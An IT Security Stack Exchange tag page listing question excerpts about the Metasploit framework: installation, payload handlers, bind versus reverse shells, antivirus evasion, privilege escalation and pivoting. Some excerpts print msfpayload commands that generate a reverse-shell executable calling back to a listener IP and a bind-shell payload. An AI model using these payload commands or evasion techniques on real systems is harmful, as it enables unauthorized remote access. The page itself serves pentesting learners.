IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [metasploit]

Metasploit is an open source exploitation framework that acts as a tool for developing and executing exploit code against a remote target machine

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on Github. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

510 questions
14
votes
3 answers

Is it safe to install metasploit on my work computer?

I'm new to metasploit, and want to install it on the work computer I use every day; but I'm not sure whether it is safe. Are there any best practices when using metasploit?
elsadek
  • 1,862
  • 2
  • 18
  • 55
12
votes
5 answers

Techniques for Anti Virus evasion

What are some good anti virus evasion techniques when using ps_exec? As a pentester I often encounter situations where you can't, for one exploit a machine as they are running anti-virus software on their machines. I'm mostly talking about binaries…
Lucas Kauffman
  • 54,437
  • 17
  • 116
  • 196
10
votes
1 answer

When to use a Bind shell vs. a Reverse shell?

Metasploit question:- I know what these shells are but am a little confused on the execution. Assuming that you successfully get a meterpreter shell and want to upload a backdoor, what should you use as a payload in the backdoor file- should I use a…
Utkarsh Agrawal
  • 493
  • 1
  • 8
  • 16
10
votes
2 answers

importing OpenVAS xml in metasploit

I am practising in my lab with some metasploitable machines, and I just realised that the vulns declared by OpenVAS 6.01 in the scan report aren’t imported in Metasploit 4.11.5 by the db_import report-blah.xml. When I read the report on the OpenVAS…
Sarastro
  • 321
  • 2
  • 13
9
votes
1 answer

What is a Payload Handler?

I'm new to the metasploit and in a book it was said that when a reverse shell is used by an attacker, a handler is initiated. I've searched the about it but doesn't found any satisfactory information about the 'Handler'. What is it?
Abhirup Bakshi
  • 187
  • 1
  • 2
  • 6
8
votes
2 answers

source code of metasploit payloads(shellcodes)

Is there a way to see a source code of metasploit shellcodes. For example: root@kali:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=1234,…
Farseer
  • 185
  • 1
  • 2
  • 5
7
votes
1 answer

What are the good resources for learning Metasploit?

I'm a newbie (Script kiddie) and I want to learn more about Metasploit. Not for fun, but to understand what exploits are, how they are used, and deployed. I've heard a lot about the Metasploit framework being good. I've even started reading the…
TheRookierLearner
  • 4,322
  • 8
  • 26
  • 29
7
votes
2 answers

Using stored creds in a metasploit module

Metasploit smartly stores your creds in its internal database, whether you've manually entered them by using a previous module or whether you've dumped them with smart_hashdump. You can view stored creds with creds. I've searched, but without…
Juicy
  • 1,447
  • 4
  • 17
  • 33
6
votes
2 answers

Metasploit wmap_run -e hangs with Using code '404' as not found

Background When I run Metasploit, it hangs at the same place no matter what I do. It stops at this line, [*] Using code '404' as not found. Steps to reproduce, msf > mfsconsole msf > load wmap msf > wmap_sites -l msf > wmap_targets -t…
NDiaz
  • 161
  • 1
  • 5
5
votes
2 answers

Is it possible to execute a command on the local computer in meterpreter?

While running meterpreter handler, is it possible to execute a command on the local computer? That wasn't mentioned in the output of help command. I also tried !ls and to no avail. Is it possible then?
daisy
  • 2,067
  • 7
  • 31
  • 44
5
votes
4 answers

windows/shell_reverse_tcp exploit is not working if listener is not running already

I am using Metasploit to generate a shell_reverse_tcp exploit using the following command: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe On listener side I am using netcat. Everything is perfect and if I run the listener…
localhost
  • 161
  • 2
  • 2
5
votes
2 answers

How to run exploit/windows/local/bypassuac using AutoRunScript?

Is there a way to run exploits that require parameters, such as the one in the title, using AutoRunScript? I was able to use AutoRunScript to execute some post commands perfectly, such as keylog_recorder or checkvm. But when I added the my script…
user342872
  • 51
  • 1
  • 2
4
votes
2 answers

Need a session ID to make a privilege escalation MSF module works

I have a limited shell on a machine and I would like to use a Metasploit module to escalate privileges. Problem: I did not get the limited shell with a metasploit module, and the metasploit module for escalation asks for a session ID. So my…
adrTuIPKJ44
  • 185
  • 1
  • 1
  • 6
3
votes
2 answers

How can I add modules to a Payload on Metasploit

I know how to create payloads using Metasploit and then script a AutoRun script, so when the victim machine connects back to my Kali Server it execute some actions. Works sweet! What I wanted to do is create a payload weaponized with actions (Create…
Frosa
  • 123
  • 1
  • 1
  • 6
3
votes
1 answer

Metasploit Pivoting on loopback?

I'm pen-testing a Windows 7 machine, and have access to a limited remote shell. I can see there's a vulnerable SMB service running on the machine's loopback, but it's not available externally. Is there any way I can run a metasploit exploit over the…
James
  • 53
  • 3
1
2 3 4 5